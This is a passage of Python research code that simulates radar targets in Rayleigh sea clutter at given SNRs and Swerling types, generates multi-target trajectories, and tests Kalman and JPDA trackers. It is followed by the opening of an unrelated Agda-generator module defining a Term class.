#clutter_background[ly:ly + h_t, lx:lx + w_t] = template + bk_roi
return clutter_background
def add_gaussian_template_on_clutter_v2(cx, cy, w, h, theta, erc, snr, clutter_background, swerling_type=0):
'''
Rewrite the swerling type's pdf. kgauss is normalized.
:return:
'''
# Erc: average clutter energy.
# Erc = np.sum(clutter_background ** 2) / clutter_background.size
sigma_x = (w/2 - 0.5) / 2 # sigma_x is related to the width of the template
sigma_y = (h/2 - 0.5) / 2
kgauss = gaussian_kernel2d(sigma_x, sigma_y, theta, bnorm=False) # Get diffusive coefficients for a 2d gaussian
Egk_numer = np.sum(kgauss.ravel() ** 2) / kgauss.size # 2d gaussian's average power.
h_t, w_t = kgauss.shape
ly = int(cy - (h_t - 1) / 2)
ry = int(cy + (h_t - 1) / 2)
lx = int(cx - (w_t - 1) / 2)
rx = int(cx + (w_t - 1) / 2)
img_h, img_w = clutter_background.shape
if ly < 0 or lx < 0 or ry > img_h or rx > img_w:
raise ValueError('template location is beyond the image boundaries!')
bk_roi = clutter_background[ly:ly + h_t, lx:lx + w_t]
# compute the amplitude coefficients according to the SNR Eq.
kcoef_global = np.sqrt(np.power(10, (snr / 10)) * erc / Egk_numer)
kcoef_peak = np.sqrt(np.power(10, (snr / 10)) * erc) # point's snr reversion
# average power of clutter is computed by numerical results in local roi-window.
erc_local = np.sum(bk_roi ** 2) / bk_roi.size
kcoef_local = np.sqrt(np.power(10, (snr / 10)) * erc_local / Egk_numer)
kcoef = kcoef_peak
if swerling_type == 0: # swerling type 0 target
kcoef_t = kcoef
template = kgauss * kcoef_t
if swerling_type == 1:
ray_scale = kcoef/np.sqrt(2)#choosing mode # /np.sqrt(2)
# central amplitude obeys the rayleigh distribution, which 2*sigma^2 = sigma_t = kcoef**2 (swerling_0's Amplitude)
kcoefs = rayleigh.rvs(loc=0, scale=ray_scale, size=1000)
kcoef_t = np.mean(kcoefs)
template = kgauss * kcoef_t
if swerling_type == 3: # central amplitude obeys the chi distribution, which degrees of freedom k=4.
df = 4
chi2_scale= kcoef/np.sqrt(df*2+df**2)#np.sqrt(df-2)#
kcoefs = chi2.rvs(df=df, scale=chi2_scale, size=1000)# or kcoef_t = chi2.rvs(df=kcoef, size=1), then template=kgauss*kcoef
kcoef_t = np.mean(kcoefs)
template = kgauss * (kcoef_t) #
# Get decrease_coeffient to make sure the inner gaussian template satisfy the snr requirement.
tcx, tcy = w_t / 2, h_t / 2
snr_lis = list(range(12, -3, -1)) # [12, 11, ..., -1, -2]
# shrink rate, take from cfar results.
snr_lis = [12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0, -1, -2]
wr_lis = [1.62, 1.67, 1.65, 1.76, 1.80, 2.00, 2.20, 2.30, 3.20, 3.50, 3.70, 3.90, 4.00, 4.2, 4.5]
hr_lis = [0.88, 0.89, 0.90, 0.92, 1.00, 1.10, 1.20, 1.20, 1.55, 1.55, 1.65, 1.70, 1.75, 2.0, 2.5]
incs_sw1= np.linspace(1.00, 2.55, 15)#[0.95, 1.00, 0.90, 0.85, 0.80, 1.10, 1.10, 1.10, 1.10, 1.10, 1.10, 2.00, 2.00, 2.20, 2.50]
#incs_sw1 = np.log2(1+incs_sw1)
decs = np.linspace(0.78, 0.34, 15)
#decs_sw1= np.linspace(1.00, 0.45, 15)
decs_sw3= np.linspace(1.20, 0.30, 15)
# decrease the size of Gaussian template, similar to the cfar_seg results.
# [cfar shrink the real target, when outside is lower than center]
wr = wr_lis[snr_lis.index(snr)]
hr = hr_lis[snr_lis.index(snr)]
iw, ih = w_t / wr, min(h_t / hr, h_t)
ix, iy, iw, ih = np.int0([tcx - iw / 2, tcy - ih / 2, iw, ih])
inner_gauss = template[iy:iy + ih, ix:ix + iw]
#dec_coef = np.sqrt(np.power(10, (snr / 10)) * erc_local / np.mean(inner_gauss ** 2))
#dec_str[snr_lis.index(snr)] = '%.2f' % dec_coef
if swerling_type == 0: # decreasing for non-fluctuating target type
dec_coef = decs[snr_lis.index(snr)]
template = template * 1#dec_coef # np.sqrt(1.618) #/2.8 # Make sure that in shrinked (cfar-segmented) target region still holds low snr.
if swerling_type == 1:
inc_coef = incs_sw1[snr_lis.index(snr)]
template = template * 1 #inc_coef
if swerling_type == 3:
dec_coef = decs_sw3[snr_lis.index(snr)]
template = template * 1#dec_coef
loc_snr = 10 * np.log10(np.sum(template ** 2) / np.sum(bk_roi ** 2))
glob_snr = 10 * np.log10(np.sum(template ** 2) / (erc * template.size))
peak_snr = 10 * np.log10(np.max(template)**2 / erc) #point's snr
# print('Swerling Type %d, kcoef_t %.2f (w %d, h %d), extened_egk %.2E' % (swerling_type, kcoef_t, w, h, Egk_numer))
# print('average (target - local clutter) power is (%.2f - %.2f)' % (np.sum(template ** 2) / template.size, erc_local))
# print('Asked snr is %d, simulated local snr is %.2f, simulated global snr is %.2f' % (snr, loc_snr, glob_snr))
local_snrs.append(loc_snr)
global_snrs.append(peak_snr)
mask = ([template > bk_roi]) * template
clutter_background[ly:ly + h_t, lx:lx + w_t] = mask + bk_roi
#clutter_background[ly:ly + h_t, lx:lx + w_t] = template + bk_roi
#Real_SNR is normally higher than peak_snr
real_snr = 10 * np.log10(max(np.max(template + bk_roi)-np.sqrt(2), np.spacing(1)) / 2)
return clutter_background
def add_uniform_template_on_clutter(cx, cy, w, h, theta, erc, snr, clutter_background, swerling_type=0):
# Erc: average clutter energy.
# Erc = np.sum(clutter_background ** 2) / clutter_background.size
# Clutter_background is a clutter background template.
kuniform = np.ones((int(h),int(w)))/(h*w)
unk_numer = np.sum(kuniform.ravel() ** 2) / kuniform.size # 2d gaussian's average power.
h_t, w_t = kuniform.shape
ly = int(cy - (h_t - 1) / 2)
ry = int(cy + (h_t - 1) / 2)
lx = int(cx - (w_t - 1) / 2)
rx = int(cx + (w_t - 1) / 2)
img_h, img_w = clutter_background.shape
if ly < 0 or lx < 0 or ry > img_h or rx > img_w:
raise ValueError('template location is beyond the image boundaries!')
bk_roi = clutter_background[ly:ly + h_t, lx:lx + w_t]
kcoef_global = np.sqrt(np.power(10, (snr / 10)) * erc / unk_numer)
erc_local = np.sum(bk_roi**2)/bk_roi.size
kcoef_local = np.sqrt(np.power(10, (snr / 10)) * erc_local / unk_numer)
kcoef = kcoef_global
if swerling_type == 0: #swerling type 0 target
kcoef_t = kcoef
template = kuniform * kcoef_t
if swerling_type == 1: #central amplitude obeys the rayleigh distribution, which 2*sigma^2 = sigma_t = kcoef (swerling_0's Amplitude)
sigma = kcoef#/np.sqrt(2)
kcoef_t = rayleigh.rvs(loc=0, scale=sigma, size=1)
template = kuniform * kcoef_t
if swerling_type == 3: #central amplitude obeys the chi distribution, which degrees of freedom k=4.
kcoef_t = chi2.rvs(df=kcoef, size=1) # or kcoef_t = chi2.rvs(df=kcoef, size=1), then template=kgauss*kcoef
template = kuniform*(kcoef_t) # for chi2, Mean=df.
loc_snr = 10*np.log10(np.sum(template**2)/np.sum(bk_roi**2))
glob_snr = 10*np.log10(np.sum(template ** 2)/(erc * template.size))
# print('Swerling Type %d, kcoef_t %.2f (w %d, h %d), extened_unk %.2E' % (swerling_type, kcoef_t, w, h, unk_numer))
# print('average (target - local clutter) power is (%.2f - %.2f)' % (np.sum(template ** 2) / template.size, erc_local))
# print('Asked snr is %d, simulated local snr is %.2f, simulated global snr is %.2f' % (snr, loc_snr, glob_snr))
local_snrs.append(loc_snr)
global_snrs.append(glob_snr)
#mask = ([template > bk_roi]) * template
#clutter_background[ly:ly + h_t, lx:lx + w_t] = mask + bk_roi
clutter_background[ly:ly + h_t, lx:lx + w_t] = template + bk_roi
return clutter_background
def get_frame(img_w, img_h, frame_no, snr, gt_dict, swerling_type=0):
'''
Get one frame combine targets and clutter together.
#add swerling type on Mar 2, 2021.
:param frame_no:
:return:
'''
frame_no_key = '%02d' % frame_no
ray_background = rayleigh.rvs(loc=0, scale=1, size=(img_h, img_w)) #sigma_n=E(n^2) = 2*scale^2
# Erc: average clutter energy.
erc = np.sum(ray_background ** 2) / ray_background.size
#add targets on the simulated position in each frame
simulated_frame = ray_background
# Each frame gets multiple targets.
gt_targets = gt_dict[frame_no_key]
for tid in gt_targets:
#Note that here x,y in gt is the top-lelf position.
x, y, w, h, theta = gt_targets[tid]
cx = x + w/2
cy = y + h/2
simulated_frame = add_gaussian_template_on_clutter_v2(cx, cy, w, h, theta, erc, snr,
simulated_frame,swerling_type)
# if tid == 'amelia':#uniform distributed target.
# simulated_frame = add_uniform_template_on_clutter(cx, cy, w, h, theta, erc, snr, simulated_frame, swerling_type)
# else:#Gaussian distributed target.
# simulated_frame = add_gaussian_template_on_clutter(cx, cy, w, h, theta, erc, snr, simulated_frame, swerling_type)
#simulated_frame = uti.frame_normalize(simulated_frame)
fids = list(gt_dict.keys())
fids.sort()
if(int(frame_no)==int(fids[-1])):
print('Averaged (extended region -- peak point) SNR is (%.2f - %.2f)' % (np.mean(local_snrs), np.mean(global_snrs)))
return simulated_frame
def manuver_in_clutter(snr=10):
'''
Simulate a target in a clutter given a snr.
:return:
'''
img_w = 256
img_h = 256
rayscale = 1
rayclutter = rayleigh.rvs(loc=0, scale=rayscale, size=(img_h, img_w)) # samples generation
Erc = np.sum(rayclutter ** 2) / rayclutter.size
xs,ys,ws,hs,thetas = s_manuver()
for i, elem in enumerate(zip(xs,ys,ws,hs,thetas)):
rayclutter = rayleigh.rvs(loc=0, scale=rayscale, size=(img_h, img_w))
x, y, w, h, theta = elem
et_clutter_frame = add_gaussian_template_on_clutter(x, y, w, h, theta, snr, rayclutter)
plt.imshow(et_clutter_frame)
plt.pause(0.1)
def multiple_extended_targets_in_clutter():
'''
:return:
'''
x0 = 20+20
y0 = 30+20
velo = (1.5, 1.2)
#velo = (3.75, 2.7)
npoints = 51
xs_cv, ys_cv = constant_velocity(x0, y0, velo, npoints)
w_cv = 20+8
h_cv = 16+4
ws_cv = np.ones(npoints)*w_cv #
#ws_cv = np.random.normal(w_cv, 0.5, npoints)
hs_cv = np.ones(npoints)*h_cv #
#hs_cv = np.random.normal(h_cv, 0.5, npoints)
theta_cv = get_orientation(xs_cv, ys_cv)
recttl_xs_cv = xs_cv - ws_cv/2
recttl_ys_cv = ys_cv - hs_cv/2
x0 = 160+20
y0 = 30+20
# velo = (-6, -2)
# acc = (0.3, 0.25)
velo = (-1.5, -0.5)
acc = (0.1, 0.1)
npoints = 51
w_ca = 28
h_ca = 20
# w_ca = 14 #for uniform_distribution
# h_ca = 20 #for uniform_distribution
xs_ca, ys_ca = constant_accelerate(x0, y0, velo, acc, npoints)
ws_ca = np.ones(npoints)*w_ca ##
#ws_ca = np.random.normal(w_ca, 0.5, npoints)
hs_ca = np.ones(npoints)*h_ca ##
#hs_ca = np.random.normal(h_ca, 0.5, npoints)
theta_ca = get_orientation(xs_ca, ys_ca)
recttl_xs_ca = xs_ca - ws_ca/2
recttl_ys_ca = ys_ca - hs_ca/2
#radius = 60
#omega = 0.0685
# x0 = 50 + 6
# y0 = 100+20
radius = 70
omega = 0.0685/1.5
npoints = 51
x0 = 50 + 6
y0 = 100 + 20
w_circ = 16+20
h_circ = 10+10
xs_circ, ys_circ = constant_turn(x0, y0, radius, omega, npoints)
ws_circ = np.ones(npoints)*w_circ ##
#ws_circ= np.random.normal(w_circ, 0.5, npoints)
hs_circ = np.ones(npoints)*h_circ ##
#hs_circ= np.random.normal(h_circ, 0.5, npoints)
theta_circ = get_orientation(xs_circ, ys_circ)
recttl_xs_circ = xs_circ - ws_circ/2
recttl_ys_circ = ys_circ - hs_circ/2
# radius = 50
# omega = -0.15
# npoints = 50
# x0 = 60 + 20
# y0 = 100 + 20
# w_ct = 16+10
# h_ct = 16+0
# xs_ct, ys_ct = constant_turn(x0, y0, radius, omega, npoints)
# ws_ct = np.random.normal(w_ct, 0.5, npoints)
# hs_ct = np.random.normal(h_ct, 0.5, npoints)
# theta_ct = get_orientation(xs_ct, ys_ct)
# x0 = 40
# y0 = 30+20
# velo = (0.5, 0)
# npoints = 50
# w_cvline = 22 + 16
# h_cvline = 17 + 13
# xs_cvline, ys_cvline = constant_velocity(x0, y0, velo, npoints)
# #ws_ca = np.ones(npoints)*w_ca ##
# ws_cvline = np.random.normal(w_cvline, 0.5, npoints)
# #hs_ca = np.ones(npoints)*h_ca ##
# hs_cvline = np.random.normal(h_cvline, 0.5, npoints)
# theta_cvline = get_orientation(xs_cvline, ys_cvline)
# recttl_xs_cvline = xs_cvline - ws_cvline/2
# recttl_ys_cvline = ys_cvline - hs_cvline/2
## This part is to view the trajectory of the ideal ground-truth.
# fig,ax =plt.subplots()
# plot_ellipse(ax, xs_cv, ys_cv, ws_cv, hs_cv, facecolor='green')
# plot_ellipse(ax, xs_ca, ys_ca, ws_ca, hs_ca, facecolor='red')
# plot_ellipse(ax, xs_circ, ys_circ, ws_circ, hs_circ, facecolor='blue')
# plot_ellipse(ax, xs_ct, ys_ct, ws_ct, hs_ct, facecolor='black')
# plt.show()
Gt_dict = {}
for i in range(npoints):
Gt_dict['%02d' % i] = {}
# tid = 1, 2, 3, 4
Gt_dict['%02d' % i]['victor']=[recttl_xs_cv[i], recttl_ys_cv[i], ws_cv[i], hs_cv[i], theta_cv[i]]
Gt_dict['%02d' % i]['amelia']=[recttl_xs_ca[i], recttl_ys_ca[i], ws_ca[i], hs_ca[i], theta_ca[i]]
Gt_dict['%02d' % i]['urich' ]=[recttl_xs_circ[i],recttl_ys_circ[i],ws_circ[i], hs_circ[i], theta_circ[i]]
#Gt_dict['%02d' % i]['line' ] =[recttl_xs_cvline[i], recttl_ys_cvline[i], ws_cvline[i], hs_cvline[i], theta_cvline[i]]
#Gt_dict['%02d' % i]['dormy']=[xs_ct[i], ys_ct[i], ws_ct[i], hs_ct[i], theta_ct[i]]
# # add target on the clutter background
# # results can be viewed on a canvas(300,300).
# img_w = 300
# img_h = 300
#
# rayscale = 1 # Base uint for computing the snr.
# rayclutter = rayleigh.rvs(loc=0, scale=rayscale, size=(img_h, img_w)) # samples generation
# Erc = np.sum(rayclutter ** 2) / rayclutter.size
#
# snr = 10
# frame_nums = len(Gt_dict)
# for key in Gt_dict:
# print('frame %s' % key)
# gt_targets = Gt_dict[key]
# for tid in gt_targets:
# x, y, w, h, theta = gt_targets[tid]
# et_clutter_frame = add_gaussian_template_on_clutter(x, y, w, h, theta, snr, rayclutter)
# plt.imshow(et_clutter_frame)
# plt.pause(0.1)
return Gt_dict
def mtt_sim():
'''
simulate 4 targets in a roi to test the JPDA algorithm.
:return:
'''
x0 = 10
y0 = 20
velo = (1.5, 1.7)
npoints = 50
x1s, y1s = constant_velocity(x0, y0, velo, npoints)
x0 = 10
y0 = 80
velo = (1.5, -2)
npoints = 50
x2s, y2s = constant_velocity(x0, y0, velo, npoints)
radius = 60
omega = 0.0685
npoints =50
x0 = 30
y0 = 50
x3s,y3s = constant_turn(x0, y0, radius, omega, npoints)
radius = 50
omega = -0.15
npoints =50
x0 = 60
y0 = 100
x4s,y4s = constant_turn(x0, y0, radius, omega, npoints)
plt.axis([0, 200, 0, 200])
plt.plot(x1s, y1s, '.', color='red')
plt.plot(x2s, y2s, '.', color='green')
plt.plot(x3s, y3s, '.', color='blue')
plt.plot(x4s, y4s, '.', color='yellow')
tx = [str(i) for i in range(1,51)]
# x = x1s
# y = y1s
# for i in range(50):
# plt.text(x[i], y[i], tx[i])
#plt.text(x1s, y1s, tx)
show_text(x1s, y1s, tx)
show_text(x2s, y2s, tx)
show_text(x3s, y3s, tx)
show_text(x4s, y4s, tx)
plt.show()
def plot_ellipse(ax, xs, ys, ws, hs, facecolor):
'''
Plot ellipse based on the ground truth sequential points:
:param ax: axis object
:param xs: x vector
:param ys: y vector
:param ws: width vector
:param hs: height vector
:return:
'''
dys = np.diff(ys)
dxs = np.diff(xs)
thetas_less = np.arctan2(dys, dxs) # len(dxs) - 1
thetas = np.pad(thetas_less,(0,1),'edge') # add one elements to the end
#ellipse_gate1 = []
#fig, ax = plt.subplots()
#plot_trajectory(xs, ys, color=facecolor)
for i in range(len(xs)):
#rect = Rectangle(xy=[x1s[i], y1s[i]], width=w1s[i], height=y1s[i], angle=theta1s[i])
angle_deg = thetas[i]*180/np.pi
e = Ellipse(xy=[xs[i], ys[i]], width=ws[i], height=hs[i], angle=angle_deg, alpha=0.5, color=facecolor)
#ellipse_gate1.append(e)
plt.plot(xs, ys, '.', color=facecolor, markersize=2)
ax.add_patch(e)
ax.set_aspect('equal')
ax.autoscale()
ax.text(xs[i], ys[i], str(i), fontsize=9, color=facecolor)
def multiple_extended_targets_sim():
'''
simulate 4 extended targets in a roi, pay attention to rotation.
theta = atan(dy/dx)
:return:
'''
x0 = 10
y0 = 20
#velo = (1.5, 1.7)
velo = (1.5, 2.7)
npoints = 50
x1m, y1m = constant_velocity(x0, y0, velo, npoints)
motion_noise = np.random.normal(3,0.4,2*npoints)
observation_noise = np.random.normal(2,0.5,2*npoints)
x1t = x1m + motion_noise[0:npoints]
y1t = y1m + motion_noise[npoints:2*npoints]
w1t = 4
h1t = 2
x1s = x1t + observation_noise[:npoints]
y1s = y1t + observation_noise[npoints:2*npoints]
w1s = np.random.normal(w1t, 0.5, npoints)
h1s = np.random.normal(h1t, 0.5, npoints)
x0 = 10
y0 = 80
velo = (1.5, -2)
npoints = 50
x2m, y2m = constant_velocity(x0, y0, velo, npoints)
motion_noise = np.random.normal(4,0.5,2*npoints)
observation_noise = np.random.normal(2,0.5,2*npoints)
x2t = x2m + motion_noise[0:npoints]
y2t = y2m + motion_noise[npoints:2*npoints]
w2t = 4
h2t = 3
x2s = x2t + observation_noise[:npoints]
y2s = y2t + observation_noise[npoints:2*npoints]
w2s = np.random.normal(w2t, 0.5, npoints)
h2s = np.random.normal(h2t, 0.5, npoints)
radius = 60
omega = 0.0685
npoints =50
x0 = 30
y0 = 50
x3m, y3m = constant_turn(x0, y0, radius, omega, npoints)
motion_noise = np.random.normal(3,0.5,2*npoints)
observation_noise = np.random.normal(2,0.5,2*npoints)
x3t = x3m + motion_noise[0:npoints]
y3t = y3m + motion_noise[npoints:2*npoints]
w3t = 6
h3t = 3
x3s = x3t + observation_noise[:npoints]
y3s = y3t + observation_noise[npoints:2*npoints]
w3s = np.random.normal(w3t, 0.5, npoints)
h3s = np.random.normal(h3t, 0.5, npoints)
radius = 50
omega = -0.15
npoints =50
x0 = 60
y0 = 100
x4m,y4m = constant_turn(x0, y0, radius, omega, npoints)
motion_noise = np.random.normal(3,0.5,2*npoints)
observation_noise = np.random.normal(2,0.5,2*npoints)
x4t = x4m + motion_noise[0:npoints]
y4t = y4m + motion_noise[npoints:2*npoints]
w4t = 5
h4t = 2
x4s = x4t + observation_noise[:npoints]
y4s = y4t + observation_noise[npoints:2*npoints]
w4s = np.random.normal(w4t, 0.5, npoints)
h4s = np.random.normal(h4t, 0.5, npoints)
Zs_dict = {}
Xt_dict = {}
for i in range(npoints):
Zs_dict['%d' % i] = []
Zs_dict['%d' % i].append(np.array([ [x1s[i]], [y1s[i]], [w1s[i]], [h1s[i]] ]))
Zs_dict['%d' % i].append(np.array([ [x2s[i]], [y2s[i]], [w2s[i]], [h2s[i]] ]))
Zs_dict['%d' % i].append(np.array([ [x3s[i]], [y3s[i]], [w3s[i]], [h3s[i]] ]))
Zs_dict['%d' % i].append(np.array([ [x4s[i]], [y4s[i]], [w4s[i]], [h4s[i]] ]))
Xt_dict['%d' % i] = []
Xt_dict['%d' % i].append(np.array([ [x1t[i]], [y1t[i]], [w1t], [h1t] ]))
Xt_dict['%d' % i].append(np.array([ [x2t[i]], [y2t[i]], [w2t], [h2t] ]))
Xt_dict['%d' % i].append(np.array([ [x3t[i]], [y3t[i]], [w3t], [h3t] ]))
Xt_dict['%d' % i].append(np.array([ [x4t[i]], [y4t[i]], [w4t], [h4t] ]))
# plt.axis([0, 200, 0, 200])
# plt.plot(x1s, y1s, '.', color='red')
# plt.plot(x2s, y2s, '.', color='green')
# plt.plot(x3s, y3s, '.', color='blue')
# plt.plot(x4s, y4s, '.', color='yellow')
# tx = [str(i) for i in range(1,51)]
# show_text(x1s, y1s, tx)
# show_text(x2s, y2s, tx)
# show_text(x3s, y3s, tx)
# show_text(x4s, y4s, tx)
# plt.show()
fig, ax = plt.subplots()
plot_ellipse(ax, x1s, y1s, w1s, h1s, facecolor='red')
plot_ellipse(ax, x2s, y2s, w2s, h2s, facecolor='green')
plot_ellipse(ax, x3s, y3s, w3s, h3s, facecolor='blue')
plot_ellipse(ax, x4s, y4s, w4s, h4s, facecolor='black')
plt.show()
return Zs_dict, Xt_dict
def show_text(xs, ys, tx):
num = len(xs)
for i in range(num):
plt.text(xs[i], ys[i], tx[i])
def plot_trajectory(xs, ys, color='red'):
'''
Draw the trajectory on the whiteboard.
:param xs:
:param ys:
:return:
'''
plt.plot(xs, ys, '.', color=color)
def test_kf(xs, ys, mx, my):
'''
:param xs: ground truth x
:param ys: ground truth y
:param mx: measured x
:param my: measured y
:return:
'''
tracker = kf_model.kalman_filter()
cx = xs[0]
cy = ys[0]
ok = tracker.init(cx, cy)
X_ = tracker.X0
P_ = tracker.P0
ex = [cx]
ey = [cy]
N = len(xs)-1
for i in range(1, N):
zx = mx[i]
zy = my[i]
X_, P_, Xpre = tracker.update(X_, P_, zx, zy)
ex.append(X_[0,0])
ey.append(X_[2,0])
plot_trajectory(xs, ys, 'red')
plot_trajectory(mx, my, 'yellow')
plot_trajectory(ex, ey, 'green')
def get_cov_ellipse(mean, cov):
'''
Get ellipse from a 2d Gaussian covariance.
:param mean:
:param cov:
:return:
'''
w, v = la.eig(cov)
angle_deg = np.arctan2(v[1, 0], v[0, 0])
angle_deg *= 180./np.pi
e = Ellipse(xy=mean, width=w[0], height=w[1], angle=angle_deg, alpha=0.5, color='black')
return e
def test_ettkf(xs, ys, mx, my, mw, mh):
'''
:param xs: ground truth x
:param ys: ground truth y
:param mx: measured x
:param my: measured y
:return:
'''
tracker = kf_model.ETT_KF_Filter()
cx = xs[0]
cy = ys[0]
vx = 4
vy = 4
w = 3
h = 1.5
ok = tracker.init(cx, vx, cy, vy, w, h)
X_ = tracker.X0
P_ = tracker.P0
ex = [cx]
ey = [cy]
ellipse_gate = []
ett_rects = []
zxpr = []
zypr = []
N = len(xs)
gamma_gate = 5
for i in range(1, N):
zx = mx[i]
zy = my[i]
zw = mw[i]
zh = mh[i]
X_, P_, X_pr, Z_pr, S, S_inv = tracker.update(X_, P_, zx, zy, zw, zh)
ex.append(X_[0,0])
ey.append(X_[2,0])
zxpr.append(Z_pr[0,0])
zypr.append(Z_pr[1,0])
# Only get the x,y mean and cov for ellipse fitting
eli = get_cov_ellipse(Z_pr[0:2], S[0:2,0:2])
rect = Rectangle(xy=[X_[0,0]-X_[4,0]/2, X_[2,0]-X_[5,0]/2], width=zw, height=zh,angle=eli.angle)
ellipse_gate.append(eli)
ett_rects.append(rect)
fig, ax = plt.subplots()
plot_trajectory(xs, ys, 'red')
plot_trajectory(mx, my, 'yellow')
plot_trajectory(ex, ey, 'green')
plot_trajectory(zxpr, zypr, 'blue')
for eg in ellipse_gate:
ax.add_artist(eg)
for rect in ett_rects:
ax.add_artist(rect)
plt.show()
def test_jpda():
'''
Test JPDA.
:return:
'''
mtt_jpda = jpda_model.Traj_manage()
mtt_jpda.init()
Zs_dict, Xt_dict = multiple_extended_targets_sim()
nframe = 0
for key in Zs_dict:
print('frame %s' % key)
Zs = Zs_dict[key]
if nframe == 0 :
mtt_jpda.track_init(Zs)
else:
mtt_jpda.track_update(Zs)
nframe += 1
print('')
def test_distribution_average_power():
'''
Test the average power (ap, or mean squared amplitude) of random point which are sampled from a known distribution.
Monitoring the relationship between the sigma and the parameters of the distribution.
:return:
'''
print('Test for point samples.')
ray_sigma = 2
ray_scale = np.sqrt(ray_sigma/2)
ray_samples = rayleigh.rvs(loc=0, scale=ray_scale, size=10000)
num_ap_ray = np.mean(ray_samples**2)
sea_clutter_samples = rayleigh.rvs(loc=0, scale=ray_scale, size=10000)
target_add_sc_samples = ray_samples+sea_clutter_samples
test_snr = 10*np.log10(np.mean((target_add_sc_samples - np.sqrt(2))**2)/2)
print('Rayleigh theroy average power (ap) is %.2f, numerical ap is %.2f'%(ray_sigma, num_ap_ray))
print('sw=1 target in clutter, snr %.2f'%test_snr)
chi_sigma = 2
chi_df = 2
chi_samples = chi.rvs(df=chi_df, loc=0, size=10000)
num_ap_chi = np.mean(chi_samples**2)
print('Chi theroy average power (ap) is %.2f, numerical ap is %.2f'%(chi_sigma, num_ap_chi))
chi2_sigma = 2
# Reversely eq: 2*df+df^2 = sigma_t
chi2_df = np.sqrt(chi2_sigma+1)-1
#scale = np.sqrt(E(x^2)/(2*df+df^2))
chi2_samples = chi2.rvs(df=4, size=10000, scale=1/np.sqrt(12))
num_ap_chi2 = np.mean(chi2_samples**2)
print('Chi2 theroy average power (ap) is %.2f, numerical ap is %.2f'%(chi2_sigma, num_ap_chi2))
print('Test for extended target samples.')
w = 28
h = 20
theta=45
sigma_x = (w / 2.5 - 0.5) / 2 #sigma_x is related to the width of the template
sigma_y = (h / 2.5 - 0.5) / 2
kgauss = gaussian_kernel2d(sigma_x, sigma_y, theta, bnorm=False) # Get diffusive coefficients for a 2d gaussian
Egk_numer = np.sum(kgauss.ravel() ** 2) / kgauss.size # 2d gaussian's average power.
h_t, w_t = kgauss.shape
snr = 0
erc = 1
# compute the amplitude coefficients according to the SNR Eq.
sigma_t = np.power(10, (snr / 10)) * erc/Egk_numer
# rayleigh_scale = np.sqrt(sigma_t / 2)
# ray_frame_samples = rayleigh.rvs(loc=0, scale=rayleigh_scale, size=10000)
# df = 4
# chi2_scale = np.sqrt(sigma_t / (2 * df + df ^ 2))
# chi2_frame_samples= chi2.rvs(df=df, scale=chi2_scale, size=10000)
# plt.hist(ray_frame_samples, color='r', alpha=0.5, bins=range(12))
# #plt.figure()
# plt.hist(chi2_frame_samples,color='y', alpha=0.5, bins=range(12))
# plt.pause(0.1)
# average power of clutter is computed by numerical results in local roi-window.
num_snr_list = []
swerling_type = 3
for i in range(1000):
if swerling_type == 0: # swerling type 0 target
a = np.sqrt(sigma_t)
template = kgauss * a
if swerling_type == 1:
rayleigh_scale = np.sqrt(sigma_t/2)
# central amplitude obeys the rayleigh distribution, which 2*sigma^2 = sigma_t = kcoef**2 (swerling_0's Amplitude)
a = rayleigh.rvs(loc=0, scale=rayleigh_scale, size=1)
#a = np.mean(a_rvs)
template = kgauss * a
if swerling_type == 3: # central amplitude obeys the chi distribution, which degrees of freedom k=4.
#df= np.sqrt(sigma_t+1)-1
df= 4
chi2_scale = np.sqrt(sigma_t/(2*df+df^2))
a = chi2.rvs(df=df, size=1, scale=chi2_scale) # or kcoef_t = chi2.rvs(df=kcoef, size=1), then template=kgauss*kcoef
#a = np.mean(a_rvs)
template = kgauss * a # for chi2, Mean=df.
num_snr = 10*np.log10(np.mean(template**2)/erc)
num_snr_list.append(num_snr)
print('swerling %d, numerical snr is %.5f'%(swerling_type, np.average(num_snr_list)))
print()
if __name__ == '__main__':
test_distribution_average_power()
#manuver_in_clutter()
# from PIL import Image
#
# data = np.random.random((2, 2))
# img1 = Image.fromarray(data)
# img1.save('test.tiff',dpi=(300,300))
# img2 = Image.open('test.tiff')
#
# f1 = np.array(img1.getdata())
# f2 = np.array(img2.getdata())
# print(f1==f2)
# print(f1)
multiple_extended_targets_in_clutter()
#using simulated targets to test jpda algorithm
#test_jpda()
#
# mean = [19.92977907, 5.07380955]
# width = 30
# height = 10.1828848
# angle = 0
# ell = Ellipse(xy=mean, width=width, height=height, angle=angle,fill=None)
# fig, ax = plt.subplots()
#
# ax.add_patch(ell)
# ax.set_aspect('equal')
# ax.autoscale()
# plt.show()
#multiple_extended_targets_sim()
xs,ys,ws,hs,thetas = s_manuver()
print('')
# mtt_sim()
# plt.show()
#plt.show()
#npts = 100
# x0 = 0
# y0 = 0
# velo=(4,4)
# xs,ys = constant_velocity(x0,y0,velo,npts)
# x0=0
# y0=200
# velo=(2,2)
# acc = 0.01
# xs,ys = constant_accelerate(x0,y0,velo,acc,npts)
# x0=50
# y0=50
# radius = 50
# omega = 0.2
# xs,ys = constant_turn(x0, y0, radius, omega, npts)
# mmean = [0,0]
# mcov = [[2, 0],
# [0,2.5]]
#
# dx, dy = np.random.multivariate_normal(mmean, mcov, npts).T
# mx = xs+dx
# my = ys+dy
# #gaussian_disturbance = norm.rvs(loc=0, scale=1, size=(1, npts))
# # plot_trajectory(xs,ys,'red')
# # plot_trajectory(mx,my,'yellow')
# #test_kf(xs,ys,mx,my)
#
# w = 3
# h = 1.5
# mw = w + dx
# mh = h + dy
# test_ettkf(xs, ys, mx, my, mw, mh)
# x0=0
# y0=200
# velo=2
# acc = 0.01
# xs,ys = constant_accelerate(x0,y0,velo,acc,npts)
# plot_trajectory(xs,ys,'blue')
#
# x0=50
# y0=50
# radius = 50
# omega = 0.2
# xs,ys = constant_turn(x0, y0, radius, omega, npts)
# plot_trajectory(xs,ys,'green')
# plt.show()
``` |
{
"source": "JoeyEremondi/agda-soas",
"score": 4
} |
#### File: agda-soas/gen/eq.py
```python
from .util import *
from .term import *
import re
from enum import Enum
class Term:
"""Top-level term in a object- and metavariable context
"""
def __init__(self, ctx, mctx):
self.ctx = ctx
self.mctx = mctx
def render(self):
"""Render a term as a string.
"""
raise Exception("Abstract method")
def apply_ren(self, ren_dict):
"""Apply a renaming to a term."""
raise Exception("Abstract method")
def apply_ren_sym(self, ren_dict):
"""Apply a symbol renaming to a term."""
raise Exception("Abstract method")
def parse_term(s, ctx, mctx, ops):
"""Parse a term consisting of operators, variables and metavariables.
Args:
s (str): Input string
ctx (list[str]): Object variable context
mctx (list[str]): Metavariable context
